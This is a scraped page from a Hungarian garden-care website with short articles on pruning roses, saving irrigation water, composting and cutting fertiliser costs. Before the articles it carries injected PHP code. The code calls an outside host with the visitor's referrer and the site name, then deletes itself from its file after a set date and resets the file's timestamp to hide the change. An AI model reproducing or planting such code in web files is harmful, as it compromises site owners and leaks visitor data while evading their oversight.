check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan...
Hogyan...

Hogyan metszük a rózsát?

 

A rózsa egyik legfontosabb ápolási munkája a metszés. Ne féljünk a rózsákat erőteljesen megmetszeni, mert a növény annyira jól regenerálódik, hogy akár 2-3 centiméteres ép hajtásból is képes még abban az évben virágot hozni. A metszést az évben lehetőleg több alkalommal végezzük el az évszaknak megfelelő módon.

 

Tavaszi metszés: márciusban, április elején érdemes a rózsákat bátran 2-3 rügyes hajtásokra visszavágni. Amint megindul, a rügyek fejlődése rögtön kezdjük el a metszést, ne várjuk meg, míg a hajtások növekedni kezdenek. A rózsa sok hosszú hajtást fejleszt. Érdemes annyira visszametszeni, hogy a rügyek lehetőleg kifelé álljanak, és a hajtások ne keresztezzék egymást. Ilyenkor határozzuk meg, merre induljon a növény növekedése. A legfelső rügy fog a legintenzívebben hajtani. Egy erősen visszavágott rózsa rengeteg virágot hoz a nyár folyamán.

Bővebben...
 

Hogyan takarékoskodjunk az öntözővízzel?

 

A víz igen nagy kincs. Tudjuk, hogy eszmei értékén kívül ára is van, még ha kútból nyerjük is, ezért úgy járunk jól, ha mindig a megfelelő mennyiséget használunk belőle a kertben is.

 

Hogyan spórolhatunk vele? Külön vízórát szereltessünk fel az öntözésre. Ha vezetékes vízzel öntözünk, célszerű egy külön vízórát felszerelni a kertben felhasznált öntözővíznek, ebben az esetben a csatornázási díjat nem kell kifizetni. Ezt a munkát egy vízvezeték szerelő tudja megtenni, bár a vízóra is pénzbe kerül. A befektetett összeg viszont egy aszályos időszakban 1-2 hónap alatt megtérül. Az öntözőrendszert mindig az éjszakai és hajnali órákra programozzuk. A nappali öntözés nem azért rossz, mert a fű „sokkot” kap a hideg kútvíztől, hanem, mert ilyenkor a párolgási veszteségünk akár 30-40%-kal is több lehet az éjszakai, hajnali öntözéshez képest. A legjobb hajnal 4-től, reggel 9-ig bezárólag öntözni, mert akkor a fű már felszárad, a víz a talajba tud szivárogni. Reggel mire munkába indulunk az öntözőrendszer el is végezte helyettünk az öntözési feladatot és hazaérve az üde zöld kertünk fogad.

Bővebben...
 

Hogyan komposztáljunk?

 

Nincs is annál jobb, mint a természetes tápanyag a kertben. Ha nem akarunk mindenáron műtrágyát használni a legjobb, ha mi magunk készített komposztot használunk. Komposztot szinte minden szerves anyagból készíthetünk.  Az elkészült komposzttal csak annyi a dolgunk, hogy a növények alá szórjuk, a talajba forgassuk, és elgereblyézzük. Bár a komposzt terítése gyep esetén nehezen oldható meg, de ez sem bonyolult feladat. Ismerkedjünk meg a komposztkészítés folyamatával.

Bővebben...
 

Hogyan csökkentsük a műtrágyázás költségeit?

 

Még mielőtt megijedne, itt csak egy egyszerű árkalkulációt fogok végezni, az árak persze minden évben módosulnak, és tapasztalataim alapján soha nem csökkennek. Elmondható azonban, hogy az arányok megmaradnak. Egy tartós hatású műtrágya általában 3-8 hónapig, de legfeljebb  egy évig képes a talajban kielégítő mennyiségű tápanyagot biztosítani. Az ilyen műtrágyák elég magas áron kerülnek forgalomba. Kereskedelmi áron is 25-40 ezer forintba kerül 25 kg, melynek ajánlott dózisa 25-35 g/négyzetméter, így egy zsák 700-1000 négyzetméterre elegendő. A rövid hatástartamú, azonnal felszívódó műtrágyapedig mindössze 7-10 ezer forintba kerül, miközben ugyanekkora terület beszórására, tápagyaggal való ellátására elegendő. A rövid hatástartalmú műtrágyából persze elképzelhető, hogy kétszer kell a fűre szórnunk a szezon időtartam alatt, de még így is gazdaságosabban ússzuk meg a gyepünk műtrágyázását. Ilyen esetben a fű szinte a teljes kiszórt mennyiséget hasznosítani tudja. Ha kiszámoljuk, 700-1000 négyzetméter területre kb. 15-20 ezer forintba kerül a műtrágya 3-4 hónapra.

Bővebben...
 
« ElsőElőző12KövetkezőUtolsó »

1. oldal / 2
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú